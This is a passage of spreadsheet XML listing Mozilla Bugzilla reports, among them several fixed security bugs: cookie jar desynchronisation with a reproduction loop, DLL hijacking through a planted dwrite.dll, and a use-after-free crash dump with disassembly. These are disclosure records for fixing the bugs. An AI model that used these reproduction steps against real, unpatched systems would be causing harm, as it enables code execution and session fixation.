      </c>
      <c r="N6299" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6299" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6299" t="inlineStr">
        <is>
          <t>[janus]</t>
        </is>
      </c>
      <c r="Q6299" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6299" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6299" t="inlineStr">
        <is>
          <t>2012-08-30</t>
        </is>
      </c>
      <c r="T6299" t="n">
        <v>1</v>
      </c>
      <c r="U6299" t="n">
        <v>0</v>
      </c>
      <c r="V6299" t="n">
        <v>6</v>
      </c>
      <c r="W6299" t="inlineStr">
        <is>
          <t>Created attachment 656620
screenshot
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:16.0) Gecko/20120827 Firefox/16.0
steps to reproduce:
1. Go to https://marketplace-dev.allizom.org/search/?q=
2. Click on one of the listed apps like "CSS3Clock"
observed behavior:
The details page which loads is blank. On a refresh, the page loads just fine. See screenshot.</t>
        </is>
      </c>
      <c r="X6299" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6300">
      <c r="A6300" t="n">
        <v>1782561</v>
      </c>
      <c r="B6300" t="inlineStr">
        <is>
          <t>2022-08-01 11:05:13 -0700</t>
        </is>
      </c>
      <c r="C6300" t="inlineStr">
        <is>
          <t>document.cookie desynchronization after cookie jar overflow</t>
        </is>
      </c>
      <c r="D6300" t="inlineStr">
        <is>
          <t>2024-01-04 01:15:24 -0800</t>
        </is>
      </c>
      <c r="E6300" t="n">
        <v>1</v>
      </c>
      <c r="F6300" t="n">
        <v>1</v>
      </c>
      <c r="G6300" t="n">
        <v>3</v>
      </c>
      <c r="H6300" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6300" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6300" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K6300" t="inlineStr">
        <is>
          <t>Firefox 103</t>
        </is>
      </c>
      <c r="L6300" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6300" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6300" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6300" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6300" t="inlineStr">
        <is>
          <t>[to be presented August 9-11, 2023][necko-triaged][adv-main116+][adv-ESR115.1+][adv-ESR102.14+]</t>
        </is>
      </c>
      <c r="Q6300" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6300" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S6300" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T6300" t="n">
        <v>1</v>
      </c>
      <c r="U6300" t="n">
        <v>0</v>
      </c>
      <c r="V6300" t="n">
        <v>27</v>
      </c>
      <c r="W6300" t="inlineStr">
        <is>
          <t>Created attachment 9287982
ffdesync.js
Steps to reproduce:
We discovered that cookie jar overflows cause a desynchronization between the cookies listed by document.cookie and the actual cookie jar. We created a demo application to reproduce the inconsistencies.  The demo is available at https://cookiedesync.minimal.blue/, full nodejs sources are attached to this report (execute with node ffdesync.js).
While creating this report we noticed a related bug at https://bugzilla.mozilla.org/show_bug.cgi?id=1761314. We decided to open a new issue and mark it as security-related due to the potential harm that this bug could cause: the reported issue allows same-origin and same-site attackers (i.e., an attacker controlling a related-domain of the target website who can set domain cookies) to fixate arbitrary cookies in document.cookie that will survive deletion attempts from the server, e.g., via the Clear-Site-Data HTTP header. This inconsistent state could introduce vulnerabilities in applications trusting the cookies read from document.cookie. Notice, for instance, that frontends often set custom HTTP headers using the values of specific cookies read via the document.cookie API. Examples are [ASP.NET](https://docs.microsoft.com/en-us/aspnet/core/security/anti-request-forgery?view=aspnetcore-6.0#javascript-1) and [Angular](https://angular.io/guide/http#security-xsrf-protection).
The issue can be manually reproduced following the steps below, please check our demo for the full set of tests.
1. Visit https://example.com/, set 181 cookies via document.cookie using the devetools Console:
    for(let i=0; i&lt;181; i++) document.cookie = `a${i}=_`;
2. Trigger a a subsequent request (ctrl-shift-r), observe the cookies attached to the request via the devtools Network tab
3. In the devtools Console, read the cookies via document.cookie
4. Go to the devtools Storage tab in the browser inspector,  delete all cookies
5. In the devtools Console, read the cookies via document.cookie
Actual results:
1. Cookies are set
2. Due to the overflow, only 151 cookies a30 ... a180 (included) are attached to the HTTP request. The Storage &gt; Cookies panel is consistently showing only these 151  cookies.
3. document.cookie shows 181 cookies, from a0 ... a180, not reflecting the actual content of the cookie jar.
4. Cookies are deleted
5. document.cookie now shows only the first 30 cookies, a0 ... a29. Notice that HTTP requests at this point do not attach any cookie. Forced page reloads do not change the output of document.cookie
Expected results:
The output of document.cookie should be consistent with the state of the cookie jar (and, consequently, with the cookies attached to HTTP requests).</t>
        </is>
      </c>
      <c r="X6300" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6301">
      <c r="A6301" t="n">
        <v>929913</v>
      </c>
      <c r="B6301" t="inlineStr">
        <is>
          <t>2013-10-23 01:42:21 -0700</t>
        </is>
      </c>
      <c r="C6301" t="inlineStr">
        <is>
          <t>[Buri][language] Wrong time format in the statusbar of CZ</t>
        </is>
      </c>
      <c r="D6301" t="inlineStr">
        <is>
          <t>2014-09-17 11:43:36 -0700</t>
        </is>
      </c>
      <c r="E6301" t="n">
        <v>1</v>
      </c>
      <c r="F6301" t="n">
        <v>1</v>
      </c>
      <c r="G6301" t="n">
        <v>2</v>
      </c>
      <c r="H6301" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6301" t="inlineStr">
        <is>
          <t>Mozilla Localizations</t>
        </is>
      </c>
      <c r="J6301" t="inlineStr">
        <is>
          <t>cs / Czech</t>
        </is>
      </c>
      <c r="K6301" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6301" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6301" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6301" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6301" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6301" t="inlineStr"/>
      <c r="Q6301" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6301" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6301" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6301" t="n">
        <v>1</v>
      </c>
      <c r="U6301" t="n">
        <v>0</v>
      </c>
      <c r="V6301" t="n">
        <v>12</v>
      </c>
      <c r="W6301" t="inlineStr">
        <is>
          <t>DEFECT DESCRIPTION:
 REDUNDANT FULL STOP AFTER THE MONTH
  REPRODUCING PROCEDURES:
 1. Open the notifications.
 2. Look at the date in upper left corner. There's a redundant full stop after the month name.
  EXPECTED BEHAVIOUR:
  ASSOCIATE SPECIFICATION:
  TEST PLAN REFERENCE:
  TOOLS AND PLATFORMS USED:
  USER IMPACT:
  REPRODUCING RATE:
 100%
  For FT PR, Please list reference mobile's behavior:</t>
        </is>
      </c>
      <c r="X6301" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6302">
      <c r="A6302" t="n">
        <v>895294</v>
      </c>
      <c r="B6302" t="inlineStr">
        <is>
          <t>2013-07-18 00:33:56 -0700</t>
        </is>
      </c>
      <c r="C6302" t="inlineStr">
        <is>
          <t>Crash [@ mozilla::dom::MaybeWrapObjectValue] with document.all after navigating away and GCing</t>
        </is>
      </c>
      <c r="D6302" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E6302" t="n">
        <v>1</v>
      </c>
      <c r="F6302" t="n">
        <v>1</v>
      </c>
      <c r="G6302" t="n">
        <v>3</v>
      </c>
      <c r="H6302" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6302" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6302" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6302" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6302" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6302" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6302" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6302" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6302" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q6302" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6302" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6302" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T6302" t="n">
        <v>1</v>
      </c>
      <c r="U6302" t="n">
        <v>0</v>
      </c>
      <c r="V6302" t="n">
        <v>40</v>
      </c>
      <c r="W6302" t="inlineStr">
        <is>
          <t>1. Set:
     user_pref("javascript.options.baselinejit.unsafe_eager_compilation", true);
2. Install https://www.squarefree.com/extensions/domFuzzLite3.xpi
3. Load the testcase
Result: Crash [@ mozilla::dom::MaybeWrapObjectValue]
Might be debug-only.</t>
        </is>
      </c>
      <c r="X6302" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6303">
      <c r="A6303" t="n">
        <v>1644954</v>
      </c>
      <c r="B6303" t="inlineStr">
        <is>
          <t>2020-06-10 21:22:16 -0700</t>
        </is>
      </c>
      <c r="C6303" t="inlineStr">
        <is>
          <t>DLL Hijacking in Firefox 77.0.1 - dwrite.dll and ntmarta.dll</t>
        </is>
      </c>
      <c r="D6303" t="inlineStr">
        <is>
          <t>2020-12-18 17:01:12 -0800</t>
        </is>
      </c>
      <c r="E6303" t="n">
        <v>1</v>
      </c>
      <c r="F6303" t="n">
        <v>1</v>
      </c>
      <c r="G6303" t="n">
        <v>3</v>
      </c>
      <c r="H6303" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6303" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J6303" t="inlineStr">
        <is>
          <t>Startup and Profile System</t>
        </is>
      </c>
      <c r="K6303" t="inlineStr">
        <is>
          <t>77 Branch</t>
        </is>
      </c>
      <c r="L6303" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6303" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6303" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6303" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6303" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main79+][adv-ESR78.1+]</t>
        </is>
      </c>
      <c r="Q6303" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6303" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S6303" t="inlineStr">
        <is>
          <t>mozilla80</t>
        </is>
      </c>
      <c r="T6303" t="n">
        <v>1</v>
      </c>
      <c r="U6303" t="n">
        <v>0</v>
      </c>
      <c r="V6303" t="n">
        <v>22</v>
      </c>
      <c r="W6303" t="inlineStr">
        <is>
          <t>Created attachment 9155855
dll_hijack_mozilla.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Steps to reproduce:
Firefox version: 77.0.1 (x86)
Use ProcMon to monitor DLLs which FireFox request but are missing. Out of a few, one of them is dwrite.dll.
This DLL is loaded from "C:\Program Files (x86)\Mozilla Firefox" and user can simply drop their own malicious code to be executed once FireFox is launched.
Actual results:
Code execution on client side. In the PoC, a text box with "DLL Hijacked!" was successfully executed once firefox.exe was launched.
This could also lead to privilege escalation if the firefox.exe is run with admin privileges.
Expected results:
As per Microsoft's recommendations, the developers should:
Validate their applications for instances of nonsecure library loads (examples of each are given later in this article). These include the following:
	- The use of SearchPath to identify the location of a library or component.
	- The use of LoadLibrary to identify the version of the operating system.
Use fully qualified paths for all calls to LoadLibrary, CreateProcess, and ShellExecute where you can.</t>
        </is>
      </c>
      <c r="X6303" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6304">
      <c r="A6304" t="n">
        <v>802778</v>
      </c>
      <c r="B6304" t="inlineStr">
        <is>
          <t>2012-10-17 12:52:53 -0700</t>
        </is>
      </c>
      <c r="C6304" t="inlineStr">
        <is>
          <t>crash in copyTexImage2D with image dimensions too large for given level</t>
        </is>
      </c>
      <c r="D6304" t="inlineStr">
        <is>
          <t>2024-05-30 07:34:08 -0700</t>
        </is>
      </c>
      <c r="E6304" t="n">
        <v>1</v>
      </c>
      <c r="F6304" t="n">
        <v>1</v>
      </c>
      <c r="G6304" t="n">
        <v>3</v>
      </c>
      <c r="H6304" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6304" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6304" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K6304" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6304" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6304" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6304" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6304" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6304" t="inlineStr">
        <is>
          <t>[adv-track-main17+][adv-track-esr17-][asan] band-aid for Mesa driver bug</t>
        </is>
      </c>
      <c r="Q6304" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6304" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6304" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T6304" t="n">
        <v>1</v>
      </c>
      <c r="U6304" t="n">
        <v>0</v>
      </c>
      <c r="V6304" t="n">
        <v>24</v>
      </c>
      <c r="W6304" t="inlineStr">
        <is>
          <t>Created attachment 672474
repro case
similar to https://bugzilla.mozilla.org/show_bug.cgi?id=785734
on intel copyTexImage2D with a level of 9 or 10 and width and height that when multiplied come close to 2&lt;&lt;level, causes crashes,
==3424== ERROR: AddressSanitizer crashed on unknown address 0x0c0800010000 (pc 0x7f40953a8d69 sp 0x7fff9cd4cf28 bp 0x7f409b106080 T0)
==3455== ERROR: AddressSanitizer crashed on unknown address 0x000000000219 (pc 0x7f4410ea8009 sp 0x7fff39b3a900 bp 0x7f4416c21c80 T0)
==3484== ERROR: AddressSanitizer crashed on unknown address 0x300400008000 (pc 0x7f2f643a8d69 sp 0x7fffc23d1648 bp 0x7f2f6a921480 T0)
==3673== ERROR: AddressSanitizer crashed on unknown address 0x060a00008000 (pc 0x7f552b0a8d69 sp 0x7fff0c6814a8 bp 0x7f5530e07480 T0)
==3703== ERROR: AddressSanitizer crashed on unknown address 0x0c0800008000 (pc 0x7f3ee3da8d69 sp 0x7fffc3351cc8 bp 0x7f3ee9b22080 T0)
==3893== ERROR: AddressSanitizer crashed on unknown address 0x000100000251 (pc 0x7f1e3f2a6526 sp 0x7fff9cf2a070 bp 0x7f1e3f550140 T0)</t>
        </is>
      </c>
      <c r="X6304" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6305">
      <c r="A6305" t="n">
        <v>503196</v>
      </c>
      <c r="B6305" t="inlineStr">
        <is>
          <t>2009-07-08 15:55:23 -0700</t>
        </is>
      </c>
      <c r="C6305" t="inlineStr">
        <is>
          <t>[Mac] Crash in [@ nsBaseWidget::Destroy() ] while printing</t>
        </is>
      </c>
      <c r="D6305" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E6305" t="n">
        <v>1</v>
      </c>
      <c r="F6305" t="n">
        <v>1</v>
      </c>
      <c r="G6305" t="n">
        <v>3</v>
      </c>
      <c r="H6305" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6305" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6305" t="inlineStr">
        <is>
          <t>Widget: Cocoa</t>
        </is>
      </c>
      <c r="K6305" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6305" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6305" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6305" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6305" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6305" t="inlineStr">
        <is>
          <t>[sg:moderate] critical if web site can cause crash w/out printing[crashkill][crashkill-fix]</t>
        </is>
      </c>
      <c r="Q6305" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6305" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6305" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T6305" t="n">
        <v>1</v>
      </c>
      <c r="U6305" t="n">
        <v>0</v>
      </c>
      <c r="V6305" t="n">
        <v>31</v>
      </c>
      <c r="W6305" t="inlineStr">
        <is>
          <t>Seen while running Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5
STR:
1. Visit the site in the URL.
2. Print to a local printer - in my case an Epson Stylus C88+
3. Crash immediately, 100% reproducible.
Breakpad: http://crash-stats.mozilla.com/report/index/2deeca2f-b2fe-4055-8468-2ad792090708. There are currently 576 crashes in this stack for people using Mac and Firefox 3.5, and several of the comments reference printing. I obtained the URL from the crash comments.</t>
        </is>
      </c>
      <c r="X6305" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6306">
      <c r="A6306" t="n">
        <v>1016117</v>
      </c>
      <c r="B6306" t="inlineStr">
        <is>
          <t>2014-05-26 14:51:46 -0700</t>
        </is>
      </c>
      <c r="C6306" t="inlineStr">
        <is>
          <t>Have treeherder emit pulse messages when resultsets are created so TC tasks can be attached</t>
        </is>
      </c>
      <c r="D6306" t="inlineStr">
        <is>
          <t>2014-10-29 14:16:35 -0700</t>
        </is>
      </c>
      <c r="E6306" t="n">
        <v>1</v>
      </c>
      <c r="F6306" t="n">
        <v>1</v>
      </c>
      <c r="G6306" t="n">
        <v>7</v>
      </c>
      <c r="H6306" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6306" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6306" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K6306" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6306" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6306" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6306" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6306" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6306" t="inlineStr"/>
      <c r="Q6306" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R6306" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6306" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6306" t="n">
        <v>1</v>
      </c>
      <c r="U6306" t="n">
        <v>0</v>
      </c>
      <c r="V6306" t="n">
        <v>17</v>
      </c>
      <c r="W6306" t="inlineStr">
        <is>
          <t>The current taskcluster + try integration creates it's own resultset and jobs. This is fine if we only wanted to create tasks and resultsets from TC but that is not the case. For some time we will need to support the current buildbot flow and other tooling that will eventually report into treeherder.
A easy solution to this is to have treeherder simply emit a pulse message when a resultset is created.
Something like:
exchange: treeherder/v1/resultset
routingKey: created.$repoName
With the current body of the resultset.
This will allow us to easily attach jobs to resultsets from different sources without racing to create the resultset (with potentially different data) and provides a much easier source of information for new commits (from try, github, hg, etc.., etc...).</t>
        </is>
      </c>
      <c r="X6306" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6307">
      <c r="A6307" t="n">
        <v>409447</v>
      </c>
      <c r="B6307" t="inlineStr">
        <is>
          <t>2007-12-21 11:29:42 -0800</t>
        </is>
      </c>
      <c r="C6307" t="inlineStr">
        <is>
          <t>remove 3.0a2,a3,a4 from update verify configs</t>
        </is>
      </c>
      <c r="D6307" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6307" t="n">
        <v>1</v>
      </c>
      <c r="F6307" t="n">
        <v>1</v>
      </c>
      <c r="G6307" t="n">
        <v>5</v>
      </c>
      <c r="H6307" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6307" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6307" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6307" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6307" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6307" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6307" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6307" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6307" t="inlineStr"/>
      <c r="Q6307" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6307" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6307" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6307" t="n">
        <v>1</v>
      </c>
      <c r="U6307" t="n">
        <v>0</v>
      </c>
      <c r="V6307" t="n">
        <v>3</v>
      </c>
      <c r="W6307" t="inlineStr">
        <is>
          <t>We commented these out from the patcher-configs and we should do the same for update configs, for consistency.</t>
        </is>
      </c>
      <c r="X6307" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6308">
      <c r="A6308" t="n">
        <v>557174</v>
      </c>
      <c r="B6308" t="inlineStr">
        <is>
          <t>2010-04-04 23:59:26 -0700</t>
        </is>
      </c>
      <c r="C6308" t="inlineStr">
        <is>
          <t>Use-after-free error in nsCycleCollector::MarkRoots()</t>
        </is>
      </c>
      <c r="D6308" t="inlineStr">
        <is>
          <t>2017-05-09 11:27:20 -0700</t>
        </is>
      </c>
      <c r="E6308" t="n">
        <v>1</v>
      </c>
      <c r="F6308" t="n">
        <v>1</v>
      </c>
      <c r="G6308" t="n">
        <v>3</v>
      </c>
      <c r="H6308" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6308" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6308" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K6308" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6308" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6308" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6308" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6308" t="inlineStr">
        <is>
          <t>[sg:critical][ccbr][critsmash:resolved]</t>
        </is>
      </c>
      <c r="Q6308" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6308" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6308" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T6308" t="n">
        <v>1</v>
      </c>
      <c r="U6308" t="n">
        <v>0</v>
      </c>
      <c r="V6308" t="n">
        <v>17</v>
      </c>
      <c r="W6308" t="inlineStr">
        <is>
          <t>Created attachment 436992
PoC
wushi of team509 sent the following vulnerability report to security@:
================================================================================
	firefox use after free  Vulnerability 
Discovery Date:  Sep 20, 2009
Discovery By :  wushi of team509
Systems Affected
This vulnerability affects the following software :
¡¡¡¡* firefox(3.5.9 tested)
    * firefox(3.0.15 tested)
Overview
firefox  contains a vulnerability. This vulnerability may allow attackers to remotely 
execute arbitrary code on the affected system. Exploitation may occur as the result of using the 
affected webkit application to visit a website. The privileges gained by a remote attacker depend on the software 
component being attacked. 
I. Description:
	unpack the ff2.rar, copy frame.jsp and 1.xhtml files to tomcat webapp dir.use firefox to visit it(I used 
3.5.7 on windows xp sp3)  firefox will crash.
the crash will like this:
(21f8.1160): Access violation - code c0000005 (!!! second chance !!!)
eax=0073006e ebx=08d0dd00 ecx=0012bb4c edx=00000000 esi=08f902cc edi=0012bba0
eip=0073006e esp=0012bb28 ebp=08d3b5c0 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
0073006e ??              ???
0:000&gt; kv
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
0012bb24 1006dcaa 08d3b5c0 108b63f4 0012bb4c 0x73006e
0012bb88 10175670 0080b000 00000000 008d2000 xul!nsCycleCollector::MarkRoots+0x72a (FPO: [Uses EBP] [1,18,0]) (CONV: thiscall) [e:\builds\moz2_slave\win32_build\build\xpcom\base\nscyclecollector.cpp @ 1571]
0012bbec 1017f503 0080b000 00826c00 004edf9e xul!nsCycleCollector::BeginCollection+0x57 (CONV: thiscall) [e:\builds\moz2_slave\win32_build\build\xpcom\base\nscyclecollector.cpp @ 2515]
0012bbf8 004edf9e 00826c00 00000002 00826c00 xul!XPCCycleCollectGCCallback+0x3a (FPO: [2,0,0]) (CONV: cdecl) [e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\nsxpconnect.cpp @ 390]
0012bca0 00535b5c 00826c00 00000000 00000000 js3250!js_GC+0x28e (CONV: cdecl) [e:\builds\moz2_slave\win32_build\build\js\src\jsgc.cpp @ 3504]
0012bcb4 10190ab8 00826c00 00826c00 1017f4c9 js3250!JS_GC+0x4c (FPO: [1,0,2]) (CONV: cdecl) [e:\builds\moz2_slave\win32_build\build\js\src\jsapi.cpp @ 2458]
0012bd70 101826fa 1019e122 00000001 00000002 xul!nsXPConnect::Collect+0x74 (FPO: [0,39,0]) (CONV: thiscall) [e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\nsxpconnect.cpp @ 478]
0012fc20 101d6e5f 0080b000 00000001 101d6e29 xul!nsCycleCollector::Collect+0x8a (FPO: [2,4007,0]) (CONV: thiscall) [e:\builds\moz2_slave\win32_build\build\xpcom\base\nscyclecollector.cpp @ 2386]
0012fc2c 101d6e29 1033e3f8 101bc394 00000001 xul!nsCycleCollector_collect+0x11 (FPO: [0,0,0]) (CONV: cdecl) [e:\builds\moz2_slave\win32_build\build\xpcom\base\nscyclecollector.cpp @ 3046]
0012fc30 1033e3f8 101bc394 00000001 1019e157 xul!nsJSContext::CC+0x2a (FPO: [0,0,0]) (CONV: cdecl) [e:\builds\moz2_slave\win32_build\build\dom\src\base\nsjsenvironment.cpp @ 3534]
0012fc64 1004c1be 08d17c30 0081b5b0 0012ff40 xul!nsJSContext::MaybeCC+0x3381b7 (CONV: cdecl)
0:000&gt; u xul!nsCycleCollector::MarkRoots+0x72a -23
xul!nsCycleCollector::MarkRoots+0x707 [e:\builds\moz2_slave\win32_build\build\xpcom\base\nscyclecollector.cpp @ 1571]:
1006dc87 3d201e0610      cmp     eax,offset xul!nsArrayCC::QueryInterface (10061e20)
1006dc8c 0f8464110000    je      xul!nsCycleCollector::MarkRoots+0x1876 (1006edf6)
1006dc92 3dc0c90910      cmp     eax,offset xul!nsEventListenerManager::QueryInterface (1009c9c0)
1006dc97 0f84ad110000    je      xul!nsCycleCollector::MarkRoots+0x18ca (1006ee4a)
1006dc9d 8d4c2414        lea     ecx,[esp+14h]
1006dca1 51              push    ecx
1006dca2 68f4638b10      push    offset xul!nsCycleCollectionISupports::COMTypeInfo&lt;int&gt;::kIID (108b63f4)
1006dca7 55              push    ebp
0:000&gt; u
xul!nsCycleCollector::MarkRoots+0x728 [e:\builds\moz2_slave\win32_build\build\xpcom\base\nscyclecollector.cpp @ 1571]:
1006dca8 ffd0            call    eax
eax set value at here:
1006dc35 8b4d00          mov     ecx,dword ptr [ebp]
1006dc38 8b01            mov     eax,dword ptr [ecx]
0:000&gt; dd ebp
08d3b5c0  01901400 08cc51b8 00000000 40300000
08d3b5d0  08debee8 00000005 00000005 00000000
08d3b5e0  08d3b600 08d3b500 08de3b60 00000000
08d3b5f0  00000000 00000000 00000000 00000000
08d3b600  08d3b620 08d3b5e0 08de3b80 00000000
08d3b610  00000000 00000000 00000000 00000000
08d3b620  08d3b640 08d3b600 08de3ba0 00000000
